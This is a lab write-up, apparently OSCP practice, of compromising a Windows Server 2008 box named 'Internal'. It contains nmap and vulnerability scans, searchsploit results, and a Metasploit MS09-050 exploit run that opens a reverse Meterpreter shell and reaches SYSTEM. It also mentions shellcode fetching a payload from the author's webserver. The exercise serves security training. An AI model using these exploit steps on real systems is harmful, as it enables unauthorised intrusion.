Internal
Enumeration⌗
NMAP⌗
┌──(kali㉿kali)-[~/Documents/OSCPprep/internal]
└─$ nmap 192.168.193.40 -Pn -oN nmapALL.txt -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 03:25 EDT
Nmap scan report for 192.168.193.40
Host is up (0.049s latency).
Not shown: 65522 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
UDP⌗
PORT STATE SERVICE
53/udp open domain
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
3702/udp open|filtered ws-discovery
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
Netbios⌗
Netbios displays current concurrent I/O operations
- port 137 UDP
NetBIOS is a service which allows communication between applications such as a printer or other computer in Ethernet or token ring network via NetBIOS name
Workgroup: It is a peer-to-peer network for a maximum of 10 computers in the same LAN or subnet. It has no Centralized Administration, which means no computer has control over another computer. Each user controls the resources and security locally on their system.
──(kali㉿kali)-[~/Documents/OSCPprep/internal]
└─$ nbtscan 192.168.193.40
Doing NBT name scan for addresses from 192.168.193.40
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.193.40 INTERNAL <server> <unknown> 00:50:56:ba:e9:bc
Version enumeration⌗
Foothold⌗
Taking a look for any known exploits with these service versions shows a potential code execution exploit in SMB
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050
──(kali㉿kali)-[~/Documents/OSCPprep/internal]
└─$ nmap --script=vuln 192.168.193.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 05:00 EDT
Nmap scan report for 192.168.193.40
Host is up (0.020s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
|_ssl-ccs-injection: No reply from server (TIMEOUT)
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ http://technet.microsoft.com/en-us/security/bulletin/ms12-020
5357/tcp open wsdapi
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
Host script results:
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
Nmap done: 1 IP address (1 host up) scanned in 75.89 seconds
┌──(kali㉿kali)-[~/Documents/OSCPprep/internal]
└─$ searchsploit ms09-050
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) | windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) | windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) | windows/remote/16363.rb
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
msf6 > search MS09-050
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
1 auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh normal No Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
2 auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff normal No Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) >
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > run
[*] Started reverse TCP handler on 192.168.49.193:4444
[*] 192.168.193.40:445 - Connecting to the target (192.168.193.40:445)...
[*] 192.168.193.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.193.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (175686 bytes) to 192.168.193.40
[*] Meterpreter session 1 opened (192.168.49.193:4444 -> 192.168.193.40:49159) at 2022-06-26 04:57:44 -0400
meterpreter > sysinfo
Computer : INTERNAL
OS : Windows 2008 (6.0 Build 6001, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > shell
Process 2480 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Looks like there’s a few exploits that might work. I also tried a different exploit script which returned a reverse shell but it wasnt stable. I tried passing it some shellcode that would execute a command to download a payload from my webserver and get a shell that way but it never connected back. Exploit was a bit unstable and kept crashing the system.